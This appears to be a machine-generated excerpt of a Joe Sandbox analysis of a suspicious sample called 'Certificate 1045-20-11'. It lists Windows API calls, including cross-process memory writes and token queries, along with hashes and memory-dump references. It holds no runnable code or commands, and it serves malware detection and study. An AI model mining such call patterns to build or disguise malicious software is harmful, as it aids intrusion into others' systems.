• Opcode ID: c0a735469788d94e3cace8be28ed5031ec02880d771d54980179bc655554e5e5
• Instruction ID: 9c7ff032513551e4405b80f75fe1d9af1daa48b18294277351e56c52b4092c93
• Opcode Fuzzy Hash: c0a735469788d94e3cace8be28ed5031ec02880d771d54980179bc655554e5e5
• Instruction Fuzzy Hash: C101F6B1200204BFDB165FAADC48DAB7ABDFFCA7557104429F949C2260DA71DC41DAA1
APIs
• CLSIDFromProgID.OLE32 ref: 00879ADC
• ProgIDFromCLSID.OLE32(?,00000000), ref: 00879AF7
• lstrcmpiW.KERNEL32(?,00000000), ref: 00879B05
• CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00879B15
• CLSIDFromString.OLE32(?,?), ref: 00879B21
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: ce3154e8a204e11e444cf2e0a1c45793c3f82cb0acdba50d0af623b81f28f2fe
• Instruction ID: c798d76bf555a0b93da327d3585dd8f3a23defba1c8fac3282503a97695b4f6e
• Opcode Fuzzy Hash: ce3154e8a204e11e444cf2e0a1c45793c3f82cb0acdba50d0af623b81f28f2fe
• Instruction Fuzzy Hash: A9018F76610229BFDB105F64EC44F9ABAFDFB44361F148438F949D2210E770DD409BA0
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00887A74
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00887A82
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00887A8A
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00887A94
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00887AD0
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: 412fc53bf2e54a62afb794c83ec4f22492e6136bdb4b7af4f307da8daf6c2c84
• Instruction ID: 448562003769a5f46f7b52b5113d3deae83de2422409551bfbce775fc87c74b0
• Opcode Fuzzy Hash: 412fc53bf2e54a62afb794c83ec4f22492e6136bdb4b7af4f307da8daf6c2c84
• Instruction Fuzzy Hash: 03011731C0462DABDF04BFA4D888AEDBB78FB08711F154466E502F2290DB30965087A1
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0087AADA
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0087AAE4
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0087AAF3
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0087AAFA
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0087AB10
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: ee31c854bf86c5245c4c6e40852620471c06514fd8553817c62914ef2ee5f65f
• Instruction ID: a926f5c305fe162ef06088b9045c50729283ffe2da53c1d6ca988ca846a2cfad
• Opcode Fuzzy Hash: ee31c854bf86c5245c4c6e40852620471c06514fd8553817c62914ef2ee5f65f
• Instruction Fuzzy Hash: CBF04F712013086FEB151FA5EC88E6B7B7DFF85764F004039F945C7190DA70D8029A61
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0087AA79
                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0087AA83
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0087AA92
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0087AA99
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0087AAAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0087EC94
                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0087ECAB
                                                                                • MessageBeep.USER32(00000000), ref: 0087ECC3
                                                                                • KillTimer.USER32(?,0000040A), ref: 0087ECDF
                                                                                • EndDialog.USER32(?,00000001), ref: 0087ECF9
                                                                                Similarity
                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3741023627-0
                                                                                APIs
                                                                                • EndPath.GDI32(?), ref: 0085B0BA
                                                                                • StrokeAndFillPath.GDI32(?,?,008BE680,00000000,?,?,?), ref: 0085B0D6
                                                                                • SelectObject.GDI32(?,00000000), ref: 0085B0E9
                                                                                • DeleteObject.GDI32 ref: 0085B0FC
                                                                                • StrokePath.GDI32(?), ref: 0085B117
                                                                                Similarity
                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                • String ID:
                                                                                • API String ID: 2625713937-0
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0088F2DA
                                                                                • CoCreateInstance.OLE32(008CDA7C,00000000,00000001,008CD8EC,?), ref: 0088F2F2
                                                                                • CoUninitialize.OLE32 ref: 0088F555
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                • String ID: .lnk
                                                                                • API String ID: 948891078-24824748
                                                                                APIs
                                                                                  • Part of subcall function 0084660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008453B1,?,?,008461FF,?,00000000,00000001,00000000), ref: 0084662F
                                                                                • CoInitialize.OLE32(00000000), ref: 0088E85D
                                                                                • CoCreateInstance.OLE32(008CDA7C,00000000,00000001,008CD8EC,?), ref: 0088E876
                                                                                • CoUninitialize.OLE32 ref: 0088E893
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                • String ID: .lnk
                                                                                • API String ID: 2126378814-24824748
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 008632ED
                                                                                  • Part of subcall function 0086E0D0: __87except.LIBCMT ref: 0086E10B
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ErrorHandling__87except__start
                                                                                • String ID: pow
                                                                                • API String ID: 2905807303-2276729525
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,008DDC50,?,0000000F,0000000C,00000016,008DDC50,?), ref: 00884645
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 008846C5
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: BuffCharUpper$__itow__swprintf
                                                                                • String ID: REMOVE$THIS
                                                                                • API String ID: 3797816924-776492005
                                                                                APIs
                                                                                  • Part of subcall function 0088430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0087BC08,?,?,00000034,00000800,?,00000034), ref: 00884335
                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0087C1D3
                                                                                  • Part of subcall function 008842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0087BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00884300
                                                                                  • Part of subcall function 0088422F: GetWindowThreadProcessId.USER32(?,?), ref: 0088425A
                                                                                  • Part of subcall function 0088422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0087BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0088426A
                                                                                  • Part of subcall function 0088422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0087BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00884280
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0087C240
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0087C28D
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                • API String ID: 4150878124-2766056989
                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,008DDC00,00000000,?,?,?,?), ref: 008AA6D8
                                                                                • GetWindowLongW.USER32 ref: 008AA6F5
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008AA705
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID: SysTreeView32
                                                                                • API String ID: 847901565-1698111956
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008AA15E
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008AA172
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 008AA196
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend$Window
                                                                                • String ID: SysMonthCal32
                                                                                • API String ID: 2326795674-1439706946
                                                                                • Opcode ID: c0c679925d3a57798548e7ad6136675de3bf4396fbdf1a60beda62391e52ad1d
                                                                                • Instruction ID: 08ef8d342d70117377b08e503c8502d985a804b4960fe9626462c61a17c1eae7
                                                                                • Opcode Fuzzy Hash: c0c679925d3a57798548e7ad6136675de3bf4396fbdf1a60beda62391e52ad1d
                                                                                • Instruction Fuzzy Hash: 4C21AB32510218BBEF159FA4CC82FEA3B79FF49724F110214FE56AB190D7B5A854CBA0
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 008AA941
                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 008AA94F
                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008AA956
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyWindow
                                                                                • String ID: msctls_updown32
                                                                                • API String ID: 4014797782-2298589950
                                                                                • Opcode ID: 08e033bc28108004d33c35a5fe9ebbfb88eaba73a5cf77555b79ef22b20caf64
                                                                                • Instruction ID: 08c8500c9a35c8d22a1f99881d016f2e6b468617ae4ba01a139c206526515f9c
                                                                                • Opcode Fuzzy Hash: 08e033bc28108004d33c35a5fe9ebbfb88eaba73a5cf77555b79ef22b20caf64
                                                                                • Instruction Fuzzy Hash: 502181B560060AAFEB14DF18CC91D7737ADFB5A364B050059FA14DB751CB32EC11CA61
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 008A9A30
                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 008A9A40
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 008A9A65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$MoveWindow
                                                                                • String ID: Listbox
                                                                                • API String ID: 3315199576-2633736733
                                                                                • Opcode ID: c2bda11b8e289672c36b7c8463ff4ed465293cb31d5595ee1f5fad70f4e66d94
                                                                                • Instruction ID: ac0036b2c24b9fa184b981c5118fab561eeef26283a7c4394c2cfec0e35aeb59
                                                                                • Opcode Fuzzy Hash: c2bda11b8e289672c36b7c8463ff4ed465293cb31d5595ee1f5fad70f4e66d94
                                                                                • Instruction Fuzzy Hash: B221B332614118BFEB218F54CC85EBB3BAAFF8A750F018129F9949B190C671AC1197A0
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008AA46D
                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008AA482
                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008AA48F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 3850602802-1010561917
                                                                                • Opcode ID: 2e44f85cb02dfc14d4a4115b86c3acade5bb02b21f4a98b089ab94198ac2985d
                                                                                • Instruction ID: 03769b05c86864dcd9bb51e249ae370dc3ba5f0841dd88ab7835529c04383a91
                                                                                • Opcode Fuzzy Hash: 2e44f85cb02dfc14d4a4115b86c3acade5bb02b21f4a98b089ab94198ac2985d
                                                                                • Instruction Fuzzy Hash: D211C171240208BEEF245F64CC49FAB3B69FF89764F014128FA45E6491D3B2E811DB28
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00862350,?), ref: 008622A1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 008622A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RoInitialize$combase.dll
                                                                                • API String ID: 2574300362-340411864
                                                                                • Opcode ID: eee1ad328ecf6ddafde639fe3765bcce61551f84469a19dff0402a3e03b84719
                                                                                • Instruction ID: d4d1e82e3c71ae643d0ad3417da4356f1fa87c4ac3b6346e7ba403322ea9c869
                                                                                • Opcode Fuzzy Hash: eee1ad328ecf6ddafde639fe3765bcce61551f84469a19dff0402a3e03b84719
                                                                                • Instruction Fuzzy Hash: 74E01A706A8700AFDB906F71EC89F243665F780716F008064B102E71A0CFB98040EF04
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00862276), ref: 00862376
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0086237D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RoUninitialize$combase.dll
                                                                                • API String ID: 2574300362-2819208100
                                                                                • Opcode ID: 42c183c2c5559a296264a653fa371375ff2f856b4db8bb34daa40e3857776490
                                                                                • Instruction ID: 1c20d6f4169d458c868ebc29c39c7c3582829bbe10bb8ef3fcb4033f82acbc83
                                                                                • Opcode Fuzzy Hash: 42c183c2c5559a296264a653fa371375ff2f856b4db8bb34daa40e3857776490
                                                                                • Instruction Fuzzy Hash: 51E0BDB06AC700EFDBA06F61EE0DF143A74FB85712F114468F209E22B0CBB9A400EB14
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LocalTime__swprintf
                                                                                • String ID: %.3d$WIN_XPe
                                                                                • API String ID: 2070861257-2409531811
                                                                                • Opcode ID: 934e311def6e4512333addb252c65b13c93f3a2dd4d082a35b9f67880639c499
                                                                                • Instruction ID: 63235aaa9ebe9d0d0d8dcee3e7ae5b2e02145e60d72f3d41473fdc0049f0b3f4
                                                                                • Opcode Fuzzy Hash: 934e311def6e4512333addb252c65b13c93f3a2dd4d082a35b9f67880639c499
                                                                                • Instruction Fuzzy Hash: 15E0127180461CDBCB649750CD15DFA7BBCF704745F5400D2B906E1205E6359B88AA23
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,008442EC,?,008442AA,?), ref: 00844304
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00844316
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-1355242751
                                                                                • Opcode ID: 2d8a9c56cf7a8468c774fc99458fc1bb91faf437977bb3cf7223fe6b07acd282
                                                                                • Instruction ID: a87e669e86d2741d0538e560944ee34bef3c56bf3749e31637d0dd09ee666352
                                                                                • Opcode Fuzzy Hash: 2d8a9c56cf7a8468c774fc99458fc1bb91faf437977bb3cf7223fe6b07acd282
                                                                                • Instruction Fuzzy Hash: 30D0A7309007169FC7205F30EC0CF11B6E4FB04701B14842AF552D2360D7B4C8808620
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,008A21FB,?,008A23EF), ref: 008A2213
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 008A2225
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetProcessId$kernel32.dll
                                                                                • API String ID: 2574300362-399901964
                                                                                • Opcode ID: 4c6e0bb5051c42469920ee50c771fc932ed0f5bc4659b7a06ac00a97ad5d0563
                                                                                • Instruction ID: c76f41834f204fd25c961f63ef4cf44908a46c32535c0bee7adab94161cf1aab
                                                                                • Opcode Fuzzy Hash: 4c6e0bb5051c42469920ee50c771fc932ed0f5bc4659b7a06ac00a97ad5d0563
                                                                                • Instruction Fuzzy Hash: BCD0A7348007169FE7316F34FC08B12F6E8FB09300B14842BE862E2650D774D8808760
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,008441BB,00844341,?,0084422F,?,008441BB,?,?,?,?,008439FE,?,00000001), ref: 00844359
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0084436B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-3689287502
                                                                                • Opcode ID: 277d030f9b90e4f528532dfa8d6c9719e129b63daf322b081fd267dab5c1b4ab
                                                                                • Instruction ID: 5ae9cb46a12460c10a6b99d4243656af84118510990b14ef51b9cf0e65ddd4e0
                                                                                • Opcode Fuzzy Hash: 277d030f9b90e4f528532dfa8d6c9719e129b63daf322b081fd267dab5c1b4ab
                                                                                • Instruction Fuzzy Hash: ACD0A7309007169FC7205F30EC09F11B6E4FB10B19B24C42AE491D2350D7B4D8808610
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,0088051D,?,008805FE), ref: 00880547
                                                                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00880559
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                • API String ID: 2574300362-1071820185
                                                                                • Opcode ID: c5f8f57873414468e5a4f56949313f27a0bf3bcf9534ddebca780aff9641a34f
                                                                                • Instruction ID: 1ebd936cc4f0980339987d6341c566078835066986cee8df89fc9890f92ce36f
                                                                                • Instruction Fuzzy Hash: CDD0A7308107129FC730BF30EC08A11B7F4FB00301B14C42EE466E2250DA74D8848F20
